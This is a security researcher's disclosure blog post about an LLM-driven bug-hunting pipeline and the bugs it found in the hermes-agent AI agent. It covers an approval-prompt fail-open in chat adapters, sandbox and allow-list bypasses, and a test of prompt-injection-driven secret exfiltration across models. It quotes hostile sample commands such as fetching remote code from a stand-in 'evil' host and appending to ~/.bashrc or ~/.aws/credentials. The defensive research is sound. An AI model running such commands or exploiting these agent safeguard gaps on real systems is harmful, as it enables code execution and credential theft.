attacks.ai/Research
← All posts
Disclosure·May 27, 2026·26 min read

We Got Glasswing at Home, and It Found Real Bugs

I wanted Anthropic's Glasswing on hardware I own, so I built it: Lucent, a near-free bug-hunter running a local 27B Qwen on one RTX 3090. Here is the build, the telemetry, and the two real bugs it surfaced in hermes-agent.

By TakyonPublished 2026-05-27
Summary
Anthropic has Glasswing, an autonomous security researcher. I wanted one on hardware I own, so I built Lucent: a staged source-code bug-hunter whose high-volume reading runs on a local 27B Qwen on a single RTX 3090, served by Lucebox at roughly 3.4× decode speed. I pointed it at hermes-agent. A static pass threw up 1,342 hits; the local sweep cut that to 126 candidate findings; a frontier-model adversarial audit triaged 15 leads down to the 2 that are real and in scope. The local reading billed about $1.62. The best moment of the engagement was a reviewer agent catching that I had been scoring three earlier exploits against a threat model the vendor had quietly rewritten.
Two-panel 'we have it at home' meme. Left, captioned GLASSWING: a radiant winged guardian bearing the Anthropic sunburst emblem and a padlock shield. Right, captioned GLASSWING AT HOME: a budget desktop PC with a cracked glass panel duct-taped on as a wing, a glowing GPU, and Linux Tux and 'HACK THE PLANET' stickers.
Anthropic has Glasswing. We have Glasswing at home.

Anthropic has Glasswing: an autonomous security researcher that reads a codebase on its own and comes back with real vulnerabilities. I wanted one too. Not rented by the API call, but running on a machine in the room with me, on models I control and can leave grinding overnight for the price of electricity.

This is how I built that machine, what its own telemetry says it did, and the two real bugs the finished version found the first time I pointed it at a serious target.

The honest headline before the build story: against hermes-agent, a static pass flagged 1,342 candidate sites, the local sweep narrowed those to 126 leads, and an adversarial audit cut them to 15 and then to the two bugs worth disclosing: an approval prompt that anyone in the chat can answer. The other is also in scope and reported to Nous, but its fix is still landing, so I am holding its details until it ships. The sharpest result of the engagement came from a reviewer agent. Partway through, after I had already "demonstrated" three other exploits, it caught that I had been grading them against a security policy the vendor had replaced six weeks earlier, which deleted most of my wins.

The first version was bad

The first attempts were barely automated. I drove a big cloud model, Opus 4.7, by hand against a real target and asked it to find bugs. It produced a confident pile: five findings and a top-ten list, almost all of it false positives and dead ends. The most convincing one was a path traversal in a PDF-extraction routine that could drop a .pth file and turn into code execution at the next Python startup, a clean chain on paper. It fell apart the moment I checked the one thing I should have checked first, whether the upstream library normalizes the filename before it writes. It does. The traversal never reaches disk.

This is the normal failure mode for a model run without checks: high confidence, mostly wrong. A bigger model does not fix it. The bottleneck is discarding bad leads fast enough to keep up, so I stopped working in a chat window and built a pipeline.

Building Lucent

There was an open-source starting point to borrow from, and I did, briefly. It did not do what I needed, and by the time the thing was finding real issues I had rewritten most of it. I call it Lucent.

Lucent is not a conversation. It is a staged pipeline, each stage free to run a different model, with the target's source read-only-mounted inside a locked-down Docker sandbox:

  • Rank. Score every source file for how likely it is to hide a vulnerability, so the expensive stages spend their budget where it matters. On a large tree this is the difference between a run that finishes and one that does not.
  • Hunt. A tiered pool of file-parallel agents reads the ranked files and records leads, each pinned to a file:line and a described mechanism. This is the highest-volume stage, and it runs on the local model.
  • Verify. An adversarial pass re-reads each lead against the source and tries to disprove it: wrong mechanism, not reachable, an artifact of the harness. Nothing advances until it survives this.
  • Exploit. Survivors go to exploit triage and a variant loop that tries to produce a working proof of concept.

Nothing is called a finding until it reaches the top of an evidence ladder: suspicion → static_corroboration → crash_reproduced → root_cause_explained → exploit_demonstrated. The top rung means a script that runs and shows the behavior against a live instance. Everything below that is a lead, and leads are cheap. The verify stage is the one that did the most work, and most of what follows is about why.

The rig: one GPU, a local 27B, Lucebox

The high-volume reading runs on a single RTX 3090. The ranker and the hunters drive a local open Qwen3.6-27B served by Lucebox, which uses speculative decoding: it drafts several tokens ahead and verifies them in a batch, so it commits multiple tokens per step instead of one. On this card, against the 27B at 4-bit, that works out to roughly 3.4× faster generation on code-like text (about 130 tokens per second, against 38 for plain autoregressive decoding), peaking past 4× on the most regular files. That is the difference between a 27B that reads source fast enough to point at a large tree and one that does not. For reference, the speculative-decoding paper this borrows from reports 4–5× on smaller models on a datacenter card; 3.4× on a 27B at 4-bit on a consumer 3090 is the version you can own.

1RTX 3090
the whole hunting rig
27B
local Qwen, the hunter
~3.4×
Lucebox decode speedup on code
130tok/s
vs 38 autoregressive
$1.62
metered cloud, the local hunt
15 → 2
leads to real bugs
The reading runs on one consumer GPU. A frontier model does the adversarial judgment.

Local does not mean only reading. The ranking, the hunting, and the verify that kills most of the leads all run on that 27B; the model that throws out all but 126 of the 1,342 static hits is the local one. A frontier model, Opus 4.7, sits on top: it orchestrates the run and does the final deep audit of the few survivors, building the proofs and arguing each one down. Each stage is free to run a different model, so that top layer is a choice rather than a floor. It earns its place for one narrow reason: a reviewer that tries to break a finding has to be at least as sharp as whatever built it, or it waves everything through. Everything beneath it stays local, because reading and triaging an 873k-line tree is the work that scales, and metering that by the token is what makes this kind of research expensive.

Ripping out Monty, wiring in Hermes

The pipeline came with an agent loop called Monty, the driver that decides what to read next and how to reason about it. It was rigid where I needed it to improvise, and it fumbled reasoning that spanned several files, so I tore it out and dropped in NousResearch's Hermes Agent, then spent a while tuning it to drive the hunt the way I wanted.

This is worth pausing on. The agent I picked to be the brain of the hunter is the same NousResearch project, hermes-agent, that I would later turn the finished hunter loose on. That was not planned. I chose Hermes because it was the best agent I had on hand, got to know its internals while making it mine, and only afterward pointed the result at the project itself. Knowing a codebase that well, from the inside, is part of why the hunt went where it did.

Weeks of it not working

None of this worked for a long time. The honest version of the timeline is weeks of the pipeline doing something wrong: the ranker burying the interesting files, the hunt stage inventing file:line references that did not exist, the verifier waving through things it should have killed, the whole run wedging because the Lucebox gateway is single-flight and would stall under load and need a restart. A cold sweep of a large tree takes hours, so every bad assumption cost the better part of a day to find.

I fixed them one at a time. I taught the verifier to distrust its own inputs, including files on disk, which mattered more than I expected (more on that below). I made Lucent checkpoint mid-run, so a stall resumes instead of starting over. I added a triage layer that recognizes when a framework or protocol library neutralizes a bug before the dangerous code can run, so those stop being reported as findings at all. Somewhere in there it went from producing confident garbage to producing a short list worth reading.

First real target: hermes-agent

hermes-agent is NousResearch's open-source personal agent: a daemon that ingests messages from many channels (Telegram, email, Slack, Matrix, Feishu, and others) and is allowed to run shell commands, write files, execute code, and install "skills" in response to them. The attack surface is the gap between a large set of untrusted-input paths and a large set of privileged actions. The tree is about 873k lines across 2,903 source files, the kind of messy, real codebase I built Lucent to chew on. I read the source and never modified it, and reported what I found to Nous Research.

Static analysis alone flagged 1,342 candidate sites before any model ran: 72 it called critical, 105 high, 1,162 medium, 3 low, and zero verified, because a pattern matcher cannot verify anything. That number is the input to the pipeline, not an output. The ranker pushed the most suspicious files to the top, the hunters read down from there, and the funnel narrowed:

1,342 126 15 static hits candidate findings triaged leads 9 dead false positive · retracted · out of scope 4 contestable hardening · latent 2 in scope #13 gateway approval — fail-open · High #14 held until its fix ships
The full triage funnel: 1,342 static-analysis hits shed down through 126 candidate findings and 15 leads to the 2 real bugs (finding 13 here; the second held until its fix ships).

How the hunt ran

The narrowing from 126 to 15 is the adversarial audit, and it is worth showing its cost because it is the opposite of the local sweep: bounded, frontier-model, and where the real spend is. About 20 specialized agents ran across the engagement: six recon auditors in parallel, each owning one surface (auth, data flow, output); one architect that turned leads into a build plan; six builders that each wrote one runnable proof of concept in its own git worktree; and six reviewer passes whose only job was to tear findings apart. One long-running orchestrator on top. That is roughly 1.5 million tokens across the 13 agents I have clean telemetry for, past 2 million counting recon and orchestration. Individual agents made 20 to 96 tool calls; the builder for the API-server bug alone made 87 before it was satisfied.

It is not a clean afternoon. Two builders died to a harness error mid-run and were recovered from disk and relaunched. The account hit a usage limit partway through, armed an auto-resume, and picked up when the limit reset. About 1h45m of measured agent-compute, but that is a sum, not a wall clock, because the builders and reviewers run in parallel. Leaving that mess out is how a writeup ends up reading like a product demo.

Most leads do not survive

The first sweep produced 126 candidate findings, and almost all of them were wrong. The convincing ones were the problem, the leads that looked solid enough to waste a day on.

The findings run 01–15 in a single sequence across this writeup, so the rows below are not contiguous: this table collects the dead ends, the real-but-out-of-scope behaviors come after it, and the complete list is in the scorecard at the end.

# What it looked like What it actually was
01 env-var exposure in web research False positive: a grep match, not a real flow
02 marker-pdf extract → .pth RCE chain Retracted: the library normalizes the filename upstream
03 WhatsApp-bridge path traversal Retracted: Baileys strips it before the bridge sees it
04 dashboard markdown XSS Not exploitable: React and Chromium eat it
05 a cluster of high-sev hits FP / latent (one nugget foreshadowed the second in-scope finding)
07 vision tool local-file read Retired: MIME-gated, superseded

Two of those retractions are worth the detail, because they are exactly the bugs you ship if you skip the last check. Finding 02 is the .pth chain from the first version, found again by the pipeline and killed the same way: marker-pdf normalizes the image filename before the vulnerable os.path.join ever sees it, so the function-level primitive is real and the end-to-end path is not. Finding 03 looked like a clean path traversal in the WhatsApp bridge's allow-list. The disproof is four steps deep: the Baileys library calls cleanMessage before the bridge's handler fires, that calls jidNormalizedUser, which for any string lacking an @ (every traversal payload) returns the empty string, and the bridge then falls back to the legitimate chat ID. The traversal string cannot be delivered. It is real at the function level and dead through the real ingress.

A few were real behaviors that fell outside scope:

  • 06, browser_cdp SSRF (real, conditional): a genuine server-side request forgery, but only when the operator configures a non-default DevTools URL.
  • 08, read_file redaction bypass (real, out of scope): a code_file=True flag skips the position-based secret masking, so an opaque value in a .env comes back unredacted. I reproduced the read-side leak. When I then asked a live model to carry the secret out, it declined and flagged the request as data exfiltration. The effective control was the model's judgment, not the redaction logic.
  • 09, framed injection to exfiltration (out of scope): confirmed across models. On the same exfil prompt, GPT-4o complied 5 times out of 6 where Sonnet-4.6 refused all six, which is exactly why model refusal is not a control you can lean on.
COMPLIED / 6: SAME EXFIL PROMPT GPT-4o 5/6 qwen3.6 3/6 Sonnet-4.6 0/6
Compliance on the same exfiltration prompt, by model. Refusal is not a control.

After the first pass nothing was clearly worth reporting, just retractions and a few real-but-out-of-scope behaviors. The danger at that point is the opposite of under-reporting: talking yourself into one of the discarded leads and shipping it anyway.

Three exploits, then a reality check

I focused on the boundaries the vendor itself defines, and three leads reproduced as working proof-of-concepts in the lab.

10. Disabling the shell re-enables it

Inside the execute_code sandbox, a script can call back into a set of sandbox tools. That set is computed as the intersection of the sandbox-eligible tools and the tools the operator enabled. If you enable code_execution but disable terminal, the intersection is empty, and the empty-set case falls back to allowing all tools. Disabling the shell therefore re-enables it, and the model is shown terminal: unavailable while the enforcement layer makes it available.

sandbox- eligible tools you enabled ∩ = ∅ no overlap fallback → ALLOW ALL meanwhile the model is shown: terminal: unavailable
Finding 10: an empty tool intersection triggers an allow-all fallback (`code_execution_tool.py:983-984`).

I confirmed this in the container: with terminal disabled, a script executed a command and id returned uid=1000(redteam), real execution as the container user.

11. Secrets reach the scrubbed sandbox

execute_code is documented to strip API keys before running model-written Python, and Nous had already shipped a fix to enforce that. But the stripper checks a skill's declared variables before applying the secret filter, and the only names it rejects are roughly 190 Hermes-branded ones. A skill that declares AWS_SECRET_ACCESS_KEY therefore passes that value into the sandbox, and the agent can author such a skill itself. I confirmed it with synthetic AWS, database, and Stripe canaries: with no skill loaded the child process had all three stripped, and with the skill registered all three arrived intact (code_execution_tool.py:1047, which runs before the secret filter at :1051).

12. Three approval-gate bypasses

At the default approvals.mode: on, three issues combine. Approvals are remembered by category label rather than by command, so approving rm -rf /tmp/build once authorizes any later rm -rf command. The danger classifier is a fixed regex list, so constructs like source <(curl evil), shred, and mv … /dev/null are not matched. And the file-write and terminal-write deny-lists disagree, so echo … >> ~/.bashrc (or ~/.aws/credentials) passes through the terminal path without a prompt. All three reproduced.

Then the verifier caught something I had missed. With three exploits demonstrated and a writeup underway, it flagged that my scope analysis was reading SECURITY.md from a local checkout. The verify stage fetched the current version from GitHub, diffed it, and the local copy was six weeks stale. Nous had not just tweaked the policy; they had rewritten the threat model from the studs.

"The only security boundary against an adversarial LLM is the operating system. Nothing inside the agent process constitutes containment — not the approval gate, not output redaction, not any pattern scanner, not any tool allowlist."

The rewritten policy is unusually direct, and stating it that plainly is the right posture. It pre-declares whole categories as out of scope: approval-gate bypasses, redaction bypasses, tool-allowlist bypasses, and a shell that stays within its declared posture. Measured against the document that was current, my three exploits collapsed:

  • 12, approval bypasses: out of scope by name. Reclassified as hardening.
  • 11, credential passthrough: the policy documents that skill-declared variables pass through and that the scrub is not a containment boundary. Hardening.
  • 10, the toolset fail-open: survives only as a contestable "this path fails open" argument.

The code still behaves this way and the PoCs still run. What changed is whether the vendor calls it a vulnerability, and mostly it does not. A demonstrated exploit measured against a stale policy ends up as a hardening suggestion. The safeguard that caught this was the verifier I had taught to distrust files on disk. The policy's central claim, that the OS is the only real boundary, also doubles as a map: it names the in-process controls that are not meant to hold. So that is where I looked next.

The in-scope finding (and a latent one)

Working from the current policy, I went after what it still treats as in scope: breaking the OS sandbox, reaching an unauthorized surface, exfiltrating a credential, or code that misrepresents its own behavior. The external chat gateways gave results quickly.

13. Any channel member can approve a dangerous command (in scope, High)

When the agent requests a dangerous action, hermes posts an approval prompt to the chat (Slack buttons, a Matrix reaction, a Feishu card) and blocks until someone responds. Each adapter re-checks who is responding, but only when a caller allow-list is configured. If the allow-list is empty, the check is skipped and any channel member can approve the command. Here is the Slack handler:

# gateway/platforms/slack.py:2499
allowed_csv = os.getenv("SLACK_ALLOWED_USERS", "").strip()
if allowed_csv:                       # empty → the whole check is skipped
    allowed_ids = {u.strip() for u in allowed_csv.split(",") if u.strip()}
    if "*" not in allowed_ids and user_id not in allowed_ids:
        logger.warning("[Slack] Unauthorized approval click by %s — ignoring", user_id)
        return
# …falls through to resolve_gateway_approval(session_key, choice)

This is distinct from the approval-gate bypasses in finding 12. The classifier fires correctly and the prompt is posted as designed; the bug is in who is permitted to answer it, which the policy lists as in scope, word for word: "resolving approvals" by a caller outside the allow-list, plus the explicit line that a code path failing open with no allow-list is a bug in scope. Two details strengthen it. Nous had already fixed the equivalent issue on Telegram, where the adapter fails closed with no list (telegram.py:540-546, with the commit comment "no allowlist means deny by default … fixes #24457"), so one of four adapters was already handled. And Slack's own code comment notes that button clicks bypass the normal message auth flow and must be checked separately, which is the check that is skipped.

The proof drives the real handler functions with a non-allowlisted caller and a genuine pending approval, spying on resolve_gateway_approval:

ADAPTER    ROLE     RESULT
Slack      VULN     FAIL-OPEN (BYPASS)
Matrix     VULN     FAIL-OPEN (BYPASS)
Feishu     VULN     FAIL-OPEN (BYPASS)
Telegram   CONTROL  fail-closed (OK)    _is_callback_user_authorized → False (fixes #24457)

vuln adapters fail-open : ['Slack', 'Matrix', 'Feishu']
control (Telegram) fail-closed: True
BYPASS CONFIRMED

A live variant goes one step further and wakes a real blocked approval waiter: a non-allowlisted attacker clicks approve and the command-approval waiter returns approved=True. It is High on Slack and Matrix, where the fail-open answers an arbitrary dangerous-command prompt, and Medium on Feishu, where it answers a narrower self-update prompt (slack.py:2499, matrix.py:2239, feishu.py:2557).

15. A dashboard XSS that did not reproduce (latent)

The dashboard renders agent-authored message links without a URL-scheme filter, and a separate endpoint returns cleartext API keys to any caller holding the same-origin session token. If a javascript: link rendered as live markup, a poisoned agent message could exfiltrate the operator's keys. I built the full chain (Chromium under Playwright, the actual Markdown.tsx component) and it did not fire. React 19's sanitizeURL rewrites a javascript: href to an inert error string, and Chromium rejects the data: fallback. I tried ten evasion variants; none worked.

This is an honest non-reproduction. It is still a weak point: the component relies on React and the browser to enforce the inert-HTML behavior the docs describe rather than enforcing it itself, and there is a live cleartext-credential sink behind it. But it is not exploitable on the versions currently shipped (React 19.2.5). I kept the PoC as a regression test that will fail the day React drops sanitizeURL.

How I know it is real

Every finding here is a script that runs against the real hermes code, read-only-mounted at /opt/hermes in a throwaway container (python:3.12-slim, pinned dependencies, non-root UID 1000, --cap-drop ALL, --security-opt no-new-privileges, --pids-limit 256, --network none where outbound access is not needed), so an in-container bug cannot touch the analysis target. Every planted secret is a canary like AKIA_CANARY_…, so any leak is unmistakable and harmless.

Each PoC is bracketed by two controls. The positive control: the sibling that handles the case correctly (Telegram for finding 13) must refuse under the same conditions. The negative control: configuring the allow-list must make the handler deny the attacker. A run prints BYPASS CONFIRMED and exits 0 only when the bypass fires and both controls hold; it exits 2 if it does not reproduce, and 3 if a control failed and the result is therefore invalid. That contract is what lets me trust a green run without re-reading 500 lines of someone else's Python. I also exercise each bug in the code directly rather than through a live model, because, as finding 08 showed, a model may decline to use a path that is wide open.

Scorecard

# What Verdict
01 web-research env exposure False positive
02 marker-pdf .pth RCE chain Retracted
03 WhatsApp-bridge path traversal Retracted
04 dashboard markdown XSS Not exploitable
05 cluster of high-sev hits FP / latent
06 browser_cdp SSRF Real, config-conditional
07 vision local-file read Retired
08 read_file redaction bypass Real gap, model-gated, out of scope
09 framed injection → exfil Real, out of scope
10 execute_code toolset fail-open Demonstrated, contestable
11 skill credential passthrough Demonstrated, hardening
12 approval-prompt bypasses Demonstrated, out of scope
13 gateway approval-resolution fail-open In scope, High
14 second in-scope finding (held) In scope; disclosed after fix
15 dashboard inert-render XSS Latent + regression test

What I filed

Two bugs out of fifteen leads. I reported both to Nous Research through coordinated disclosure, against upstream main at commit b62af47da, with a fix for each. The fix for 13 is the one the vendor has already written once: mirror the Telegram adapter's fail-closed fallback in Slack, Matrix, and Feishu, so an empty allow-list denies by default unless an explicit opt-in flag is set. That is +40/−14 across three files, and it ships with a validation harness that flips the PoC from BYPASS CONFIRMED to not-reproduced once applied. The second in-scope finding went over with its own fix and is still being rolled out, so I am holding its writeup until the patch ships.

The rest is a hardening list, not advisories: the toolset fail-open (10), the credential passthrough (11), and the approval-gate gaps (12) are all real code behaviors the current policy declines to call vulnerabilities, and they are welcome as pull requests. The most useful non-code thing is documentation: 15 shows a component trusting React and the browser to enforce a security stance the component should enforce itself, with a cleartext-credential endpoint waiting behind it.

What it cost, and what that means

Here is the honest cost. The work that scales with the size of the codebase, the ranking and reading and the adversarial verify across 1,342 hits and 126 leads, runs on the local 27B. That is the near-free part: the metered cloud spend for a hunt comes to about $1.62, and even that is an accounting figure, because those stages ran on the GPU and cost electricity. The frontier layer on top, the orchestration and the deep audit that built and confirmed the two bugs, came to about 20 agents and a couple million tokens for the whole engagement. It is the only part with a real per-token price, and it stayed small enough to trip a usage limit and resume on its own.

None of this needed a frontier lab's budget. It needed a near-free local reader doing the volume and the triage, a frontier model only for the final audit, an adversarial verifier allowed to kill the findings feeding it, and the discipline to check scope against the policy that is current rather than the one on disk. The two bugs matter, but the rig that found them is reusable: I have already pointed it at other open-source projects, and I will write those up as I go.

Update — the gateway fix is in (2026-06-07)

Nous merged the fix for finding 13 in PR #41226. The approval-button handlers now fail closed when no allow-list is set: they deny by default unless GATEWAY_ALLOW_ALL_USERS is set as an explicit opt-in. That is the shape I had recommended, the Telegram fallback mirrored across the other adapters, and it ships with regression tests that pin the fail-closed behaviour so it cannot drift back.

Two things in the merged patch are worth being straight about, because neither lines up with my writeup exactly.

It fixed an adapter I never tested. My finding covered Slack, Matrix, and Feishu; the patch covers Slack, Feishu, and Discord. Discord's button-approval path had the same empty-allow-list fail-open, and I never looked at it. I found the class; the maintainer found one more instance of it than I had.

Matrix had already moved. Of the three adapters I flagged, the patch only needed Slack and Feishu, because Matrix had been brought fail-closed somewhere between the commit I audited (b62af47da) and the one the patch branched from; its reaction handler denies by default on its own now. So three adapters were fail-open at my audit commit, and by the time the fix landed it was the two the PR names, plus the Discord path I had missed.

The patch leaves the second in-scope finding alone. It is untouched by #41226 and still open as far as I can see, so nothing changes there: it stays held until its own fix ships.

The hermes-agent source was read but not modified, on NousResearch/hermes-agent at commit b62af47da. Severities are my own estimates, pending vendor triage. Finding 13 was reproduced as BYPASS CONFIRMED in the isolated container described above and reported to Nous Research through coordinated disclosure, along with a second in-scope finding held until its fix ships.

Want to try Lucent?

Lucent isn't something you can download yet — it's the hunter behind this writeup, and I'm still sharpening it. Leave your email and I'll tell you the moment it opens up. Or just email me.

New posts by emailSecurity research, AI testing, and tool releases — when they ship.